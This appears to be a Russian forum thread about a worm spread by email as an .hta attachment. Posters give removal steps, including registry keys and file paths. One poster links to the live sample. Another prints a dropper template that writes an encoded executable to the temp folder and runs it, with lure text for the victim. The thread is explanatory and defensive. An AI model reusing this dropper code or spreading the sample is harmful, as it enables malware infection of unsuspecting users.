Сегодня на 2 моих ящика пришло 2 примерно одинаковых сообщения, типа привет как дела ... вот заплатка или прога от нового вируса, но факт в том, что эти сообщения пришли с разных ящиков и с одним и тем же файликом Имя файла: _________.hta Размер файла: 60КБ имя файла одинаковвые как на одном так и на другом мыле. Что это может значить, и не приходило ли вам такое сообщение? Вот залил эту прогу, толи заплатку сюда: http://slil.ru/22915583 Жду ответов...
нет это не троян. я же написал что это червь.... он сканит машину на адреса почты. Ищит адреса в следующих файлах: adb asp cfg cgi dbx dhtm dhtml eml htm html jsp mbx mdx mht mmf mra msg nch ods oft php pl sht shtm stm tbb txt uin wab wsh xls xml и рассылает себя по найденым адресам. Причем рассылает себя используя примое подключение к SMTP серваку. Для удаления, если уже подхватили: Удалить из реестра вот эти записи. [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe] "Debugger"="%Windir%\csrss.exe" [HKLM\Software\Microsoft\Windows\CurrentVersion\Run] "Application"="%Windir\csrss.exe" и вот эти файлы %Windir%\csrss.exe C:\ntldr.exe
затрояненный HTA-файл может выглядеть примерно так. <font color="#008000"><HTML> <HEAD><hta:application /> <SCRIPT language="JavaScript"> code = "MZ%90%00%03%00%00%00%04 ...... "; // Закодированный троян var fso = new ActiveXObject("Scripting.FileSystemObject"); var tf = fso.GetSpecialFolder(2); // Получим windows\temp var fn = tf + "\\x.exe"; // Добавим имя файла var a = fso.CreateTextFile(fn, true); // Запишем в файл тело трояна a.Write(unescape(code)); a.Close(); var WshShell = new ActiveXObject("WScript.Shell"); WshShell.Exec(fn); // Запустим его </SCRIPT> </HEAD> <BODY> Привет, чувак! TheBat не показывает картинки, так что открой этот файл в Ехплорере. </BODY> </HTML></font> --------------------------------------------------------------------------------------------------- вопрос что за этот код и как и с чем его едят code = "MZ%90%00%03%00%00%00%04 ...... "; // Закодированный троян
